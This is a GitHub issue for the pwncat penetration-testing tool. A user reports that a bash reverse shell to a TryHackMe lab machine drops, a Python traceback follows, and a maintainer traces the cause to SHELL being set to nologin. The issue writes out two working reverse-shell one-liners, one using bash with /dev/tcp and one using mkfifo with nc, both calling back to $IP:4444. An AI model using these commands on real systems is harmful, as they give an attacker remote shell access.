You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
If you are pasting terminal output or code snippets, place them in a code block (three backticks) in accordance with Markdown formatting for easier reading
Describe the bug
A reverse shell should be established with a bash payload, however, after waiting for a long while, no shell was established. Previously before the windows update the bash payload worked with pwncat.
I enter the command bash -c 'exec bash -i &>/dev/tcp/$IP/4444 <&1'
I waited for a while and then the error was shown as below.
└─$ pc -lp 4444
[05:23:28] Welcome to pwncat 🐈! __main__.py:127
[05:24:09] received connection from 10.10.243.111:52186 bind.py:58
[05:24:12] 10.10.243.111:52186: registered new host w/ db manager.py:491
[05:24:43] connection failed: channel recieve timed out: b' exec /usr/bin/script -qc /usr/sbin/nologin /dev/null 2>&1\nThis account is currently not available.\r\n' manager.py:491
(local) pwncat$ sessions
[05:25:29] warning: 10.10.243.111:52186: channel closed manager.py:491
Traceback (most recent call last):
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 96, in send
written += self.client.send(data[written:])
BrokenPipeError: [Errno 32] Broken pipe
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 591, in run
self.dispatch_line(line)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 670, in dispatch_line
command.run(self.manager, args)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/sessions.py", line 57, in run
session.current_user().name,
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 141, in current_user
return self.find_user(uid=self.platform.getuid())
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 146, in find_user
foruserin self.run("enumerate.gather", progress=False, types=["user"]):
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 196, in run
return module.run(self, **kwargs)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in decorator
results = [
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in<listcomp>
results = [
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/agnostic/enumerate/gather.py", line 145, in run
foritemin module.run(session, types=types):
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in decorator
results = [
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in<listcomp>
results = [
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/enumerate.py", line 193, in run
foritemin self.enumerate(session):
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/linux/enumerate/user/__init__.py", line 23, in enumerate
with passwd.open("r") as filp:
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 303, in open
return self._target.open(
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 1179, in open
formethodin self.gtfo.iter_methods(
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/gtfobins.py", line 493, in iter_methods
path = self.which(name)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 668, in which
path = self._do_which(name)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 735, in _do_which
result = self.run(
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 777, in run
p = popen_class(
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 1055, in Popen
self.channel.send(command + b"\n")
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 39, in _wrapper
return method(self, *args, **kwargs)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 101, in send
raise ChannelClosed(self) from exc
pwncat.channel.ChannelClosed: channel unexpectedly closed
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/__main__.py", line 266, in main
manager.interactive()
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 552, in interactive
self.parser.run()
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 605, in run
exc.cleanup(self.manager)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/__init__.py", line 57, in cleanup
session = manager.find_session_by_channel(self.channel)
AttributeError: 'Manager' object has no attribute 'find_session_by_channel'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/tools/pwncat-env/bin/pc", line 8, in<module>sys.exit(main())
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/__main__.py", line 282, in main
progress.update(task, status="done!", completed=100)
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 420, in __exit__
self.sessions[0].close()
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 322, in close
self.platform.exit()
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 561, inexit
self.channel.send(b"exit\n")
File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 38, in _wrapper
raise ChannelError(self, "channel not connected")
pwncat.channel.ChannelError: channel not connected
I also tested a reverse shell with netcat rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP 4444 >/tmp/f, and this connection was successfully established, and I was able to interactive without any issues
Expected behavior
Connection should be establish as usual
The text was updated successfully, but these errors were encountered:
This should be a relatively easy fix. It appears that for some reason the SHELL environment variable pointed to /usr/sbin/nologin. I have no clue why that would be the case, but when spawning the pty, pwncat attempts to reuse your existing shell. This ended up just disconnecting you, because nologin simply prints a message and exits. 😫
This is not really required but since you have added a check for nologin
You may want to check for multiple SHELL values instead of just checking nologin or do the reverse that is check for SHELLs that allow login.
Some examples are below:
If you are pasting terminal output or code snippets, place them in a code block (three backticks) in accordance with Markdown formatting for easier reading
Describe the bug
A reverse shell should be established with a bash payload, however, after waiting for a long while, no shell was established. Previously before the windows update the bash payload worked with pwncat.
Describe the target system
This https://tryhackme.com/room/wekorra room. Linux system presumably Ubuntu.
To Reproduce
Steps to reproduce the behavior:
bash -c 'exec bash -i &>/dev/tcp/$IP/4444 <&1'
I also tested a reverse shell with netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP 4444 >/tmp/f
, and this connection was successfully established, and I was able to interactive without any issuesExpected behavior
Connection should be establish as usual
The text was updated successfully, but these errors were encountered: